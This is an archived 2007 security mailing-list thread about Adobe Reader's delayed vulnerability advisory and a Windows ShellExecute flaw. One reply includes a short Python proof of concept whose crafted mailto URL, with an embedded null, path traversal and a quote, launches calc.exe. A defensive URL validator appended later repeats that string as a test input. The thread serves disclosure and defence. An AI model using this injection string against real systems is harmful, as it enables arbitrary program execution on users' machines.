funsec mailing list archives
Re: Adobe confirms critical vulnerability after a remarkable delay
From: rms () computerbytesman com
Date: Tue, 9 Oct 2007 14:37:03 -0400 (EDT)
Hi,

BTW, it is the ShellExecute Win32 function that is busted. The attached Python test program runs the Windows calculator on my system with IE7 installed. ShellExecute should either return an error or run the default email reader.

This security problem will affect programs that use ShellExecute with a user-supplied URL. The problem here is Windows gets confused by an embedded null and double quotes in a URL and does the wrong thing.

This doesn't feel like the same bug as the IE7/Firefox problem that surfaced in July which was a problem with quoting URLs on command lines.

Richard

================================================
import win32api

def main():
    win32api.ShellExecute(0,
                          "open",
                          'mailto:test%00../../../../windows/system32/calc.exe".cmd',
                          "",
                          ".",
                          0)
    return

main()
================================================
Adobe has provided information with a workaround related to critical code execution vulnerability reported by Mr. Petko D. Petkov (aka pdp) on 20th Sep.
http://www.gnucitizen.org/blog/0day-pdf-pwns-windows

That was almost three weeks ago...

The following advisory title states affected Acrobat versions:

Workaround available for vulnerability in versions 8.1 and earlier of Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa07-04.html

Go and backup your registry and apply these changes!

Red Hat has officially informed Linux versions are not vulnerable.

- Juha-Matti

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.
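A caller-side check for the case the message above describes, a program handing a user-supplied URL to ShellExecute. This is an added example, not part of the original post and not a vendor fix; `check_launch_url`, `fully_decode` and the scheme allow-list are hypothetical names and assumptions, and the check goes slightly beyond the post by also rejecting other control characters and double-encoded input.

```python
import re
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https", "mailto"}  # assumption: schemes this app needs
FORBIDDEN = re.compile(r'[\x00-\x1f\x7f"]')    # NUL, other control chars, double quote
MAILTO_ADDR = re.compile(r"[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+")

def fully_decode(url, max_rounds=5):
    """Percent-decode until stable, so a double-encoded NUL (%2500) is seen too."""
    for _ in range(max_rounds):
        decoded = unquote(url, errors="strict")  # malformed UTF-8 raises ValueError
        if decoded == url:
            return url
        url = decoded
    raise ValueError("too many encoding layers")

def check_launch_url(url):
    """Return (ok, reason) for a URL about to be handed to a URL launcher."""
    try:
        decoded = fully_decode(url)
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable: {exc}"
    for form in (url, decoded):  # check both the raw and the decoded form
        hit = FORBIDDEN.search(form)
        if hit:
            return False, f"forbidden character {hit.group()!r}"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    if scheme == "mailto":
        if not MAILTO_ADDR.fullmatch(unquote(parts.path)):
            return False, "mailto target is not a plain address"
    elif not parts.netloc:
        return False, "missing host"
    return True, "ok"

# Constructed inputs; the first is the string from the test program above.
SAMPLES = [
    'mailto:test%00../../../../windows/system32/calc.exe".cmd',
    "mailto:test%2500.cmd",
    "mailto:user@example.com?subject=hi",
    "https://example.com/a%20b",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_launch_url(sample), sample)
```

Only a URL for which `check_launch_url` returns `True` would be passed on to the launcher; everything else is rejected before any Win32 call is made.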
Current thread:
- Adobe confirms critical vulnerability after a remarkable delay Juha-Matti Laurio (Oct 09)
- Re: Adobe confirms critical vulnerability after a remarkable delay rms (Oct 09)